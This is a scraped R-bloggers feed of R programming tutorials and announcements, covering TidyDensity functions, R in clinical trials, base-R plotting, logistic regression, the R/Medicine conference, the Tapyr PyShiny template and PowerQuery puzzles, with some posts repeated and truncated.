$ kurtosis    3.790972, 3.243122
$ range       27.19248, 28.51258
$ iqr         7.469292, 7.282262
$ variance    29.57279, 28.61787
$ ci_low      4.010739, 3.997601
$ ci_high     26.33689, 23.60014

Behind the Scenes: MLE Optimization

Under the hood, the function leverages MLE through the optim() function to estimate the Chi-square parameters. It minimizes the negative log-likelihood function to obtain the best-fitting degrees of freedom (dof) and non-centrality parameter (ncp) for your data.

Initial values for the optimization are intelligently set based on your data’s sample variance and mean, ensuring a robust estimation process.

Visualizing the Results

One of the strengths of TidyDensity is its seamless integration with visualization tools like ggplot2. With the combined output from util_chisquare_param_estimate(), you can easily create insightful plots that compare the empirical distribution with the estimated Chi-square distribution.

result$combined_data_tbl |>
  tidy_combined_autoplot()

This example demonstrates how you can visualize the empirical data overlaid with the fitted Chi-square distribution, providing a clear representation of your dataset’s fit to the model.

Conclusion

In summary, util_chisquare_param_estimate() from TidyDensity is a versatile tool for estimating Chi-square distribution parameters from your data. Whether you’re exploring the underlying distribution of your dataset or conducting statistical inference, this function equips you with the necessary tools to gain valuable insights.

If you haven’t already, give it a try and let us know how you’re using TidyDensity to enhance your data analysis workflows! Stay tuned for more updates and insights from the world of R programming. Happy coding!

To leave a comment for the author, please follow the link and comment on their blog: Steve's Data Tips and Tricks.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Estimating Chisquare Parameters with TidyDensity

De-Mystifying R Programming in Clinical Trials

Venkatesan Balu — Thu, 02 May 2024 00:00:00 +0000

[This article was first published on pharmaverse blog, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Introduction

The use of R programming in clinical trials has not always been the most popular and obvious in the past. Despite experiencing significant growth in recent years, the adoption of R programming in clinical trials is not as widespread and evident as anticipated. Practical implementation faces obstacles due to various factors, including occasional misunderstandings, particularly in the context of validation, and a notable lack of awareness regarding its capabilities. However, despite these challenges, R is steadily establishing a growing presence within the pharmaceutical industry.

Opportunities for R Programming in Clinical Trials

Although R is versatile and applicable in various settings, it is commonly associated with scientific computing and statistics. In the context of clinical trials, where researchers aim to understand and enhance drug development and testing processes, R has become a prominent tool for analyzing the collected data. While SAS® has been a longstanding programming language for clinical trials, the industry has been exploring alternative options. There is a quest for sustainable technology and tools that can effectively address industry challenges.

To drive innovation, there is a need to move away from traditional, inefficient processes and tools toward solutions that are efficient, simple, easy to implement, reliable, and cost-effective. Collaboration among industry stakeholders is crucial to develop a robust technology ecosystem and establish consensus on validation and regulatory benchmarks. Equally vital is preparing the workforce with the necessary skillsets to meet future demands.

Current Usage Trends of R

Analyzing the current trends of R in the pharmaceutical industry reveals that its usage still has room for growth when related to Pharma Regulatory Submissions. However, R finds extensive use in public health projects, healthcare economics, exploratory and scientific analysis, trend identification, generating plots/graphs, specific statistical analysis, and machine learning. R continues to advance steadily in clinical trials, however lacks widespread usage within the clinical space.

This is an area that we see gradually evolving thanks to a number of across-industry efforts such as pharmaverse.

SAS® or R Programming: Which is Better?

SAS® or R?

The ongoing debate in the programming community revolves around whether to replace SAS® with R, use both, or explore other alternatives like Python. Instead of adopting an either-or scenario, leveraging the strengths of each programming language for specific Data Science problems is recommended, recognizing that one size does not fit all. Despite the challenges early adopters of R have faced in regulatory compliance, there have been notable successes that highlight the benefits and potential of using R in regulated industries. Early adopters of R have faced challenges, with regulatory compliance for R packages being a common issue.

For R to be considered for tasks related to regulatory submission, a rigorous risk assessment of R packages, feasibility analysis, and the establishment of processes for R usage through pilot projects with necessary documentation becomes imperative. We see great progress in this area through efforts such as the R Consortium R Submissions WG.

Benefits of Using R Programming

R, as a language and environment for statistical computing and graphics, possesses characteristics that make it a potentially powerful tool for Data Analysis. With approximately 2 million users worldwide and three decades of legacy, R stands out as open-source software receiving substantial support from the community. Its availability under the GNU General Public License and extensive documentation contribute to its strength. R is versatile, running on various platforms, offering a wide array of statistical and graphical techniques, and its ease of producing publication-quality plots enhances its appeal.

The pharmaceutical industry has witnessed the emergence of various R packages tailored for Clinical Trial reporting. Examples include {rtables} for creating tables for reporting clinical trials, {admiral} for CDISC ADaM, {pkglite} to support eSubmission, and many others. Pharmaverse packages cater to different aspects of clinical trial data analysis, showcasing the versatility of R in this domain.

This article talks more about use of R in clinical trials and how this will be used by taking advantages of open source of R. The FDA emphasizes the need for fully documenting software packages used for statistical analysis in submissions. The use of R poses specific challenges related to validation, given its free and open-source nature. To address this, the R Validation Hub has released guidance documents focusing in this space.

Given that the cost of the R package is non-chargeable, it can also serve as a potential tool for API integration. For instance, in signal detection, R packages can prove to be valuable tools due to the intricate derivation process for EBGM in the Bayesian approach, which aims to mitigate false positive signals resulting from multiple comparisons. The computation adjusts the observed-to-expected reporting ratio for temporal trends and confounding variables such as age and sex. While both methods can estimate this, the accessibility of R as free software enables easy integration into any system as an API or for macro estimation purposes without any copyrights issue. As always though consult the license of any package being used to be sure your usage is in compliance.

Identifying the Limitations in Using R Programming

It is crucial to note that software cost is essential to any company, including Pharma and Biotechs. While R and RStudio® are free and SAS® requires an annual license, using R instead of SAS® may not always lower costs. The cost of software is only one part of the equation. To be used in a highly regulated industry such as pharmaceuticals, software validation, maintenance, and support are critical, and their costs need to be considered. Although R is free and open source, it comes with a learning curve, and in short term the industry might face a shortage of experienced pharma R programmers compared to those familiar with SAS®.

Leveraging the Right Tools to Capture Value

Capturing the value of R programming starts with a clear vision for its use and a systematic approach to identifying and prioritizing the needs in the industry. Clinical Data Science is evolving rapidly, and the industry actively seeks alternative solutions to unlock valuable insights from diverse datasets. Recognizing the need for innovation, collaboration, and efficient tools is crucial. Rather than viewing SAS®, R, and Python as mutually exclusive, leveraging the strengths of each for appropriate Data Science problems provides a nuanced and effective approach.

Ensuring data quality, scientific integrity, and regulatory compliance through risk assessment frameworks, validation, and documentation are imperative in this dynamic landscape. Pharmaverse is also actively steering the pharmaceutical industry’s path by pioneering connections and advocating for R, thus exemplifying the broader trend of industries acknowledging the value and potential of open-source tools in tackling complex challenges.

Leveraging the Right Tools

Last updated

2024-05-02 12:57:13.410429

Details

source code, R environment

Reuse

CC BY 4.0

Citation

BibTeX citation:

@online{balu2024,
  author = {Balu, Venkatesan},
  title = {De-Mystifying {R} {Programming} in {Clinical} {Trials}},
  date = {2024-05-02},
  url = {https://pharmaverse.github.io/blog/posts/2024-04-15_de-_mystifying__.../de-_mystifying__r__programming_in__clinical__trials.html},
  langid = {en}
}

For attribution, please cite this work as:

Balu, Venkatesan. 2024. “De-Mystifying R Programming in Clinical Trials.” May 2, 2024. https://pharmaverse.github.io/blog/posts/2024-04-15_de-_mystifying__…/de-_mystifying__r__programming_in__clinical__trials.html.

To leave a comment for the author, please follow the link and comment on their blog: pharmaverse blog.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: De-Mystifying R Programming in Clinical Trials

How to add Axes to Plot in R

R Archives » Data Science Tutorials — Wed, 01 May 2024 04:22:59 +0000

[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

The post How to add Axes to Plot in R appeared first on Data Science Tutorials

Unravel the Future: Dive Deep into the World of Data Science Today! Data Science Tutorials.

How to add Axes to Plot in R, In the world of data visualization, creating visually appealing and informative plots is crucial for effectively communicating insights.

The R programming language offers a plethora of tools to customize your plots, including the ability to add user-defined axis ticks using the axis() function.

In this article, we will walk you through three examples that demonstrate how to create plots with custom axis ticks in R.

Predict potential customers in R » Data Science Tutorials

Example 1: Draw Plot with Default Axis Ticks

Before diving into custom axis ticks, let’s first learn how to draw a basic plot with default axis specifications.

The plot() function in R can be used to create a scatterplot, as shown in the code snippet below:

plot(1:200)           # Default plot

This code will generate a scatterplot with default axis values.

Example 2: Plot with Specified Axis Ticks

Now, let’s move on to adding user-defined axis labels using the axis() function. First, we need to create a graph without any axis values:

plot(1:200,           # Plot without axes
     xaxt = "n",
     yaxt = "n")

Once the plot is created without axes, we can use the axis() function to add axis values.

The side parameter is used to specify which axis to modify, with 1 representing the x-axis and 2 representing the y-axis.

How to Label Outliers in Boxplots in ggplot2? (datasciencetut.com)

The c() function is used to define the tick values for the respective axis:

axis(side = 1,        # Draw x-axis
     c(0, 50, 100, 150, 200)) #Just an example
axis(side = 2,        # Draw y-axis
     c(10, 50, 150)) #Just an example

Example 3: Plot with Axis Mark on Top & Right Side

In some cases, you may want to add axis ticks on the top and right side of the plot.

This can be achieved using the same R code as in the previous example, but with different values for the side parameter.

Instead of 1 and 2, we will use 3 and 4 to represent the top and right axes, respectively:

plot(1:200,           # Plot without axes
     xaxt = "n",
     yaxt = "n")
axis(side = 3,        # Add axis on top
     c(0, 50, 100, 200)) #Just an example
axis(side = 4,        # Add axis on right side
     c(0, 50, 110)) #Just an example

Plotting Equations in R »

The post How to add Axes to Plot in R appeared first on Data Science Tutorials

Unlock Your Inner Data Genius: Explore, Learn, and Transform with Our Data Science Haven! Data Science Tutorials.

To leave a comment for the author, please follow the link and comment on their blog: R Archives » Data Science Tutorials.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: How to add Axes to Plot in R

Introducing check_duplicate_rows() from TidyDensity

Steven P. Sanderson II, MPH — Wed, 01 May 2024 04:00:00 +0000

[This article was first published on Steve's Data Tips and Tricks, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Introduction

Today, we’re diving into a useful new function from the TidyDensity R package: check_duplicate_rows(). This function is designed to efficiently identify duplicate rows within a data frame, providing a logical vector that flags each row as either a duplicate or unique. Let’s explore how this function works and see it in action with some illustrative examples.

Understanding `check_duplicate_rows()`

The check_duplicate_rows() function takes a single argument, .data, which should be a data frame. It then compares each row of the data frame to every other row to identify duplicates based on complete row matches.

check_duplicate_rows(.data)

Examples

Let’s start by demonstrating how this function operates with two scenarios: one where there are no duplicate rows, and another where there are duplicate rows with identical values in specific columns.

Example 1: No Duplicates

First, let’s create a data frame where all rows are unique. We’ll use the iris dataset for this example:

# Load required libraries
library(TidyDensity)

# Create a data frame (iris dataset)
data_no_duplicates <- iris

# Check for duplicate rows
duplicates <- check_duplicate_rows(data_no_duplicates)

# View the result
any(duplicates)

[1] FALSE

In this case, the duplicates vector will contain only FALSE values, indicating that no rows in iris are exact duplicates of each other.

Example 2: Duplicate Rows

Next, let’s create a scenario where some rows contain identical values in specific columns. We’ll manually construct a data frame for this purpose:

# Create a data frame with duplicate rows
data_with_duplicates <- data.frame(
  Name = c("John", "Alice", "John", "Bob", "Alice","David"),
  Age = c(25, 30, 25, 40, 30, 50),
  Score = c(85, 90, 85, 75, 90, 50)
)

# Check for duplicate rows
duplicates <- check_duplicate_rows(data_with_duplicates)

# View the result
duplicates

[1] FALSE FALSE FALSE FALSE FALSE  TRUE

In this example, the duplicates vector will indicate which rows are duplicates (TRUE for duplicates, FALSE for unique rows). You’ll notice that the last row is flagged as a duplicate because there is the same value for the Age and Score columns.

Conclusion

The check_duplicate_rows() function in the TidyDensity package is a handy tool for identifying duplicate rows within a data frame. It can be particularly useful for data cleaning and quality assurance tasks, ensuring that datasets are free from unintended duplicates that could skew analysis results.

If you work with data frames and want a straightforward way to detect duplicate rows efficiently, consider incorporating check_duplicate_rows() into your R workflow with TidyDensity. This function exemplifies the package’s commitment to providing practical, user-friendly tools for data manipulation and analysis.

That wraps up our overview of check_duplicate_rows(). We hope you find this function useful in your data analysis endeavors! If you have any questions or feedback, feel free to reach out in the comments below. Until next time, happy coding with R!

To leave a comment for the author, please follow the link and comment on their blog: Steve's Data Tips and Tricks.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Introducing check_duplicate_rows() from TidyDensity

Logistic regression is not advanced ‘machine learning’ or ‘artificial intelligence’

pacha.dev/blog — Wed, 01 May 2024 04:00:00 +0000

[This article was first published on pacha.dev/blog, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Motivation

One of the most common comments I hear is that logistic regression (also called Binomial regression) is some kind of “advanced magic”, “machine learning”, “artificial intelligence” or “big data”. This is not true.

In this post, I will show you how logistic regression works and why it is not as complex as some people think.

Explanation

Logistic regression consists in transforming the data and then using linear regression (or ordinary least squares) repeated multiple times until achieving convergence.

The differences with the classic linear model are:

It uses a binary dependent variable (i.e., heads or tails when we flip a coin, which we can express as 0/1). The linear model takes a continuous variable (i.e., the temperature in a city) as the dependent variable.
It uses an exponential function to transform the data before fitting a regression.
It returns estimated probabilities (i.e., 0.42, 0.91, …, 0.47) that we can convert to 0/1 by using a threshold (i.e., all the values over 0.5 become 1).

Before we continue, and in case you want to read more, the Logistic regression is a part of the Generalized Linear Models (GLM) family. This family includes other models like Gaussian (i.e., “normal” or “classic” regression), Poisson, Gamma, and others that have the exponential function in their formula. Some books such as Casella and Berger refer to them as the “exponential family”.

Worked example

In base R, we can use the glm function to fit a logistic regression model. Let’s use the mtcars dataset to predict if a car has automatic transmission (am, coded as 0 for automatic and 1 for manual) as a function of the miles per gallon (mpg).

R commands follow the previous explanation about a general family of models. We will use the family argument to specify the type of model we want to fit, which in this case is binomial.

coef(glm(am ~ mpg, data = mtcars, family = binomial))

(Intercept)         mpg 
 -6.6035267   0.3070282

Leaving the statistical significance aside, the second estimated coefficient (0.307) indicates that more miles per gallon are associated with a higher probability of having a manual transmission.

We can predict the probability of having a manual transmission for the cars in the dataset.

am_pred <- predict(glm(am ~ mpg, data = mtcars, family = binomial), type = "response")
head(am_pred)

        Mazda RX4     Mazda RX4 Wag        Datsun 710    Hornet 4 Drive 
        0.4610951         0.4610951         0.5978984         0.4917199 
Hornet Sportabout           Valiant 
        0.2969009         0.2599331

To convert this probability to a binary outcome, we can use a threshold of 0.6 (arbitrary).

am_pred_binary <- ifelse(am_pred > 0.6, 1, 0)
head(am_pred_binary)

        Mazda RX4     Mazda RX4 Wag        Datsun 710    Hornet 4 Drive 
                0                 0                 0                 0 
Hornet Sportabout           Valiant 
                0                 0

This can be compared with the actual data.

head(mtcars$am)

[1] 1 1 1 0 0 0

For a better comparison, we can use a confusion matrix, which shows the number of true positives, true negatives, false positives, and false negatives.

table(am_pred_binary, mtcars$am)

              
am_pred_binary  0  1
             0 18  7
             1  1  6

This matrix shows that the proposed model is not good at predicting the transmission type of the cars in the dataset. There are eight cases (out of 32) where the model predicted the incorrect transmission type, which can be fixed by adding more variables to the model, but that would be for another post.

It is possible to obtain the same coefficients from the glm() function by transforming the data following the Binomial regression “recipe” and then using lm() repeated times until reaching convergence. However, this is very unpractical and just for explanatory purposes.

# original variables
y <- mtcars$am
x <- mtcars$mpg

# apply the recipe: define the new variables
mu <- (y + 0.5) / 2
eta <- log(mu / (1 - mu))
z <- eta + (y - mu) / mu

# iterate with initial values for the difference and the sum of sq residuals

dif <- 1
rss1 <- 1
tol <- 1e-10

while (abs(dif) > tol) {
  fit <- lm(z ~ x, weights = mu)
  eta <- z - fit$residuals
  mu <- exp(eta) / (1 + exp(eta))
  z <- eta + (y - mu) / mu
  res <- y - mu
  rss2 <- sum(res^2)
  dif <- rss2 - rss1
  rss1 <- rss2
}

coef(lm(z ~ x, weights = mu))

(Intercept)           x 
 -6.6035267   0.3070282

That’s it, in a few lines we wrote a straightforward code to fit a logistic regression. This is not magic, machine learning, or artificial intelligence. It is just a linear model repeated multiple times and it is tractable.

If you liked this post

I wrote the The Hitchhiker’s Guide to Linear Models to covers regressions starting with high school math and then all the explanations until reaching Binomial, Poisson and Tobit models. You can get it for free or paying a suggested price of 10 USD.

To leave a comment for the author, please follow the link and comment on their blog: pacha.dev/blog.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Logistic regression is not advanced ‘machine learning’ or ‘artificial intelligence’

Introducing check_duplicate_rows() from TidyDensity

Steven P. Sanderson II, MPH — Wed, 01 May 2024 04:00:00 +0000

[This article was first published on Steve's Data Tips and Tricks, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Introduction

Understanding `check_duplicate_rows()`

check_duplicate_rows(.data)

Examples

Example 1: No Duplicates

First, let’s create a data frame where all rows are unique. We’ll use the iris dataset for this example:

# Load required libraries
library(TidyDensity)

# Create a data frame (iris dataset)
data_no_duplicates <- iris

# Check for duplicate rows
duplicates <- check_duplicate_rows(data_no_duplicates)

# View the result
any(duplicates)

[1] FALSE

In this case, the duplicates vector will contain only FALSE values, indicating that no rows in iris are exact duplicates of each other.

Example 2: Duplicate Rows

Next, let’s create a scenario where some rows contain identical values in specific columns. We’ll manually construct a data frame for this purpose:

# Create a data frame with duplicate rows
data_with_duplicates <- data.frame(
  Name = c("John", "Alice", "John", "Bob", "Alice","David"),
  Age = c(25, 30, 25, 40, 30, 50),
  Score = c(85, 90, 85, 75, 90, 50)
)

# Check for duplicate rows
duplicates <- check_duplicate_rows(data_with_duplicates)

# View the result
duplicates

[1] FALSE FALSE FALSE FALSE FALSE  TRUE

Conclusion

To leave a comment for the author, please follow the link and comment on their blog: Steve's Data Tips and Tricks.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Introducing check_duplicate_rows() from TidyDensity

R/Medicine is coming June 10-14, 2024 – See Top Five R Medicine Talks from Previous Years

R Consortium — Tue, 30 Apr 2024 15:57:07 +0000

[This article was first published on R Consortium, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

What to get a feel for the kind of content will be available at R/Medicine 2024? We’re spotlighting the most engaging and educational sessions from past R Medicine Virtual Conferences. Whether you’re a healthcare professional, a data scientist, or simply curious about the intersection of healthcare and technology, these selected talks offer a wealth of knowledge and innovation using the R programming language. Dive into these sessions to enhance your understanding and skills in medical data science.

Register for the R Medicine 2024 Virtual Conference here!

1. GitHub Copilot in Rstudio, It’s Finally Here! – R Medicine Virtual Conference 2023

This session introduces GitHub Copilot for RStudio, a highly anticipated tool that enhances coding efficiency and innovation in medical research. Watch as experts demonstrate its capabilities and potential impact on healthcare data analysis.

2. Analyzing Geospatial Data in R (Sherrie Xie) – R/Medicine 2022 Virtual Conference

Featuring Sherrie Xie, this presentation explores the applications of geospatial data analysis within the healthcare sector using R. Gain insights into the importance of spatial data in understanding health trends and outcomes.

3. R/Medicine 101: Intro to R for Clinical Data (Stephan Kadauke, Joe Rudolf, Patrick Mathias) – R/Medicine 2022

This introductory session is perfect for those new to using R in a clinical setting. The speakers guide you through the basics and demonstrate how R can revolutionize medical research and patient care.

4. Introduction to R for Medical DataTidy Spreadsheets in Medical Research – R/Medicine 2021

UMich Prof and {medicaldata} author Peter Higgins will cover best practices for using medical data in spreadsheets like Excel and Google Sheets.

5. Multistate Data Using the {survival} Package – R/Medicine 2021

Explore the use of the {survival} package in R for analyzing multistate data. Discover the methods and models that are shaping the future of survival analysis in medical research.

Engage and Learn More!

Each of these sessions provides unique insights and practical tools for harnessing the power of R in medical research and healthcare analytics. Whether you are watching these for the first time or revisiting them, each video promises a deep dive into the capabilities of R that are driving advancements in the field.

Mark Your Calendars! The R Medicine Conference for this year is scheduled for June 10-14. Register now to secure your spot and connect with a community of like-minded professionals!

Register for the R Medicine 2024 Virtual Conference here!

Remember to subscribe to the R Medicine channel for more updates and upcoming conference information. Enhance your skills in medical data science today!

The post R/Medicine is coming June 10-14, 2024 – See Top Five R Medicine Talks from Previous Years appeared first on R Consortium.

To leave a comment for the author, please follow the link and comment on their blog: R Consortium.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: R/Medicine is coming June 10-14, 2024 – See Top Five R Medicine Talks from Previous Years

Introducing Tapyr: Create and Deploy Enterprise-Ready PyShiny Dashboards with Ease

Gift Kenneth — Tue, 30 Apr 2024 14:28:32 +0000

[This article was first published on Tag: r - Appsilon | Enterprise R Shiny Dashboards, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Are you an R/Shiny user looking to leverage the incredible capabilities of Shiny for Python without sacrificing the familiarity and comfort of your existing tools?

Introducing Tapyr—our Shiny for Python framework. It brings Rhino-like capabilities from the R world and more to the Shiny for Python ecosystem, helping you build enterprise-ready applications with ease.‍

Curious about Shiny for Python from an R Shiny dev’s perspective? Check out this blog post to learn more.

Tapyr is designed as a lightweight template repository for PyShiny projects that offers tools similar to Rhino for R/Shiny. For instance, Tapyr introduces poetry, which handles project dependencies much like renv in R. This ensures that R users can smoothly adapt to Python without tackling a steep learning curve while adhering to best practices from day 0.

Key Features of Tapyr

Leverage Python Tools: Tapyr takes advantage of Python’s ecosystem tools, including ruff, pytest, and others.
Enterprise-Ready Applications, Made Easy: The framework is tailored for building robust, scalable, and production-ready applications.
Comprehensive Testing with Playwright: Say goodbye to the hassle of juggling multiple languages for end-to-end testing. Tapyr leverages Playwright, integrated with pytest, allowing you to write all tests in Python – a streamlined approach that keeps your coding practices consistent and efficient.
Static Type Checking with PyRight: Improve code quality and reduce bugs with PyRight, a static type checking feature not available in R. This proactive error detection ensures your applications are reliable, before you even start them.

Complementing Existing Resources

While Posit’s PyShiny templates cater to exploratory data analysis, Tapyr serves a distinct, complementary role by providing a structured repository designed to kickstart your projects. This approach focuses on developing comprehensive, scalable and future-proof applications.

This not only expands the tools available to data scientists and developers but also helps you to tackle larger, more complex projects effectively.

Tapyr is ideal for data scientists (transitioning from R to Python), developers familiar with Shiny and Rhino building projects in PyShiny, and academic researchers and enterprise professionals requiring enterprise-level dashboard frameworks.

Getting Started with Tapyr

Using Devcontainer

We recommend using the Dev Container configuration with Visual Studio Code (VS Code) or DevPod to ensure a consistent development experience across different computers and environments. It may sound complicated, but it is as easy as a breeze!

‍

The Dev Container is like a virtual environment with everything you need to work on the project, including all the required software and dependencies.

‍

Install Dev Containers extension if you don’t have it already.

VS Code Dev Containers

‍

Clone the repository and start the dev container: You can clone the Tapyr repository from GitHub or download the source code. some text
1. Navigate to the project directory and open the project in VS Code.
2. Select “Reopen in Container” when prompted.
3. If you’re prompted to “Reopen in Container,” select that option. If not, you can open the Command Palette (Ctrl+Shift+P on Windows/Linux, or Cmd+Shift+P on Mac) and choose “Remote-Containers: Reopen in Container.”
4. If you’re using DevPod, follow their instructions to start the Devcontainer.

‍

Reopen in Container

‍

Activate the virtual environment: Once the Dev Container is running, you’ll need to activate the virtual environment (creating a special workspace where all the project’s dependencies are installed). Run the following command:

poetry shell

‍

Activate in virtual environment

Run the application: Now you’re ready to run the application! Use this command:

shiny run app.py --reload

Run the application

This will start the application and automatically reload it whenever you make changes to the code.

Tapyr | PyShiny Template

Execute tests: To run tests and ensure everything is working correctly, use this command:

poetry run pytest

If you prefer to run this locally, you can do so using Poetry.

Struggling with Quality Assurance for your Shiny for Python Dashboards? Check out this blog post to learn more about leveraging Playwright.

Get Started Today

Dive into Tapyr and start building your enterprise-level applications today!

Download Tapyr, check out the documentation, explore its functionalities, and join the community of innovators expanding their PyShiny skillsets.

We value your feedback, so please share your experiences and suggestions to help us improve Tapyr in our Shiny community.

‍

Want to stay up to date with Tapyr and other packages? Join 4.2k explorers and get the Shiny Weekly Newsletter into your mailbox.

FAQs

Q: Is there a community or support available for Tapyr users?

A: You can create a pull request, open an issue, follow our documentation, and engage with other users in our community to get support, share insights, and contribute to the project’s development.

‍

Q: How is Tapyr different from Posit’s PyShiny templates?

A: While Posit’s PyShiny templates focus on exploratory data analysis, Tapyr is a framework focused on building comprehensive, scalable PyShiny applications.

‍

Q: How does Tapyr compare to other tools like reticulate?

A: While reticulate allows you to call Python from R, Tapyr takes a different approach by providing a streamlined framework for building enterprise-ready applications using Shiny for Python. Since all the code is written in Python, it offers features like static type checking, comprehensive testing with Playwright, and seamless integration with Python ecosystems.

The post appeared first on appsilon.com/blog/.

To leave a comment for the author, please follow the link and comment on their blog: Tag: r - Appsilon | Enterprise R Shiny Dashboards.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Introducing Tapyr: Create and Deploy Enterprise-Ready PyShiny Dashboards with Ease

PowerQuery Puzzle solved with R

Numbers around us — Tue, 30 Apr 2024 12:24:49 +0000

[This article was first published on Numbers around us - Medium, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

#177–178

Puzzles

Author: ExcelBI

All files (xlsx with puzzle and R with solution) for each and every puzzle are available on my Github. Enjoy.

Puzzle #177

We are about to create reports for three students, each of them have to pass 3 exams for each subject. If even one of them has mark lower than 40, person fails the subject. Then we have to find their averages per person and rank acording to it. And make small adjustment in first columns, not to repeat names for every subject. Check the code.

Loading libraries and data

library(tidyverse)
library(readxl)

input = read_excel("Power Query/PQ_Challenge_177.xlsx", range = "A1:F10")
test  = read_excel("Power Query/PQ_Challenge_177.xlsx", range = "H1:M10")

Transformation

result = input %>%
  rowwise() %>%
  mutate(Result = if_else(any(c(Marks1, Marks2, Marks3) < 40), "Fail", "Pass"),
         total = Marks1 + Marks2 + Marks3) %>%
  ungroup() %>%
  mutate(average = mean(total), 
         rn = row_number(),
         .by = Name) 

aux_rank = result %>%
  select(Name, average) %>%
  distinct() %>%
  mutate(Rank = rank(-average))

result2 = result %>%
  left_join(aux_rank, by = "Name") %>%
  select(Name, Classs, Subject, `Total Marks` = total, Result, Rank, rn) %>%
  mutate(Name = ifelse(rn == 1, Name, NA_character_),
         Classs = ifelse(rn == 1, Classs, NA_real_),
         Rank = ifelse(rn == 1, Rank, NA_integer_)) %>%
  select(-rn)

Validation

identical(result2, test) 
#> [1] TRUE

Puzzle #178

HR should track how people they hire are advancing in positions, get promotions, but also if they are moving to another department or employer. We had input table containing of records of such events. But we need it to be more readable. Lets pivot the data.

Loading libraries and data

library(tidyverse)
library(readxl)

input = read_excel("Power Query/PQ_Challenge_178.xlsx", range = "A1:E5")
test  = read_excel("Power Query/PQ_Challenge_178.xlsx", range = "H1:K5")

Transformation

result = input %>%
  pivot_longer(-Emp, names_to = "Change", values_to = "Value") %>%
  separate(Change, into = c("Type", "Change"), sep = " ") %>%
  pivot_wider(names_from = Type, values_from = Value) %>%
  drop_na() 

# but one of my co-solver asked, why didn't I use only one pivot_longer
# check Anil Kumar Goyal's solution then.

input %>%
 pivot_longer(-Emp, names_to = c(".value", "Change"), names_sep = " ") %>%
 na.omit()

Validation

identical(result, test)
# [1] TRUE

Feel free to comment, share and contact me with advices, questions and your ideas how to improve anything. Contact me on Linkedin if you wish as well.

PowerQuery Puzzle solved with R was originally published in Numbers around us on Medium, where people are continuing the conversation by highlighting and responding to this story.

To leave a comment for the author, please follow the link and comment on their blog: Numbers around us - Medium.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: PowerQuery Puzzle solved with R

PowerQuery Puzzle solved with R

Numbers around us — Tue, 30 Apr 2024 12:24:49 +0000

[This article was first published on Numbers around us - Medium, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

#177–178

Puzzles

Author: ExcelBI

All files (xlsx with puzzle and R with solution) for each and every puzzle are available on my Github. Enjoy.

Puzzle #177

Loading libraries and data

library(tidyverse)
library(readxl)

input = read_excel("Power Query/PQ_Challenge_177.xlsx", range = "A1:F10")
test  = read_excel("Power Query/PQ_Challenge_177.xlsx", range = "H1:M10")

Transformation

result = input %>%
  rowwise() %>%
  mutate(Result = if_else(any(c(Marks1, Marks2, Marks3) < 40), "Fail", "Pass"),
         total = Marks1 + Marks2 + Marks3) %>%
  ungroup() %>%
  mutate(average = mean(total), 
         rn = row_number(),
         .by = Name) 

aux_rank = result %>%
  select(Name, average) %>%
  distinct() %>%
  mutate(Rank = rank(-average))

result2 = result %>%
  left_join(aux_rank, by = "Name") %>%
  select(Name, Classs, Subject, `Total Marks` = total, Result, Rank, rn) %>%
  mutate(Name = ifelse(rn == 1, Name, NA_character_),
         Classs = ifelse(rn == 1, Classs, NA_real_),
         Rank = ifelse(rn == 1, Rank, NA_integer_)) %>%
  select(-rn)

Validation

identical(result2, test) 
#> [1] TRUE

Puzzle #178

Loading libraries and data

library(tidyverse)
library(readxl)

input = read_excel("Power Query/PQ_Challenge_178.xlsx", range = "A1:E5")
test  = read_excel("Power Query/PQ_Challenge_178.xlsx", range = "H1:K5")

Transformation

result = input %>%
  pivot_longer(-Emp, names_to = "Change", values_to = "Value") %>%
  separate(Change, into = c("Type", "Change"), sep = " ") %>%
  pivot_wider(names_from = Type, values_from = Value) %>%
  drop_na() 

# but one of my co-solver asked, why didn't I use only one pivot_longer
# check Anil Kumar Goyal's solution then.

input %>%
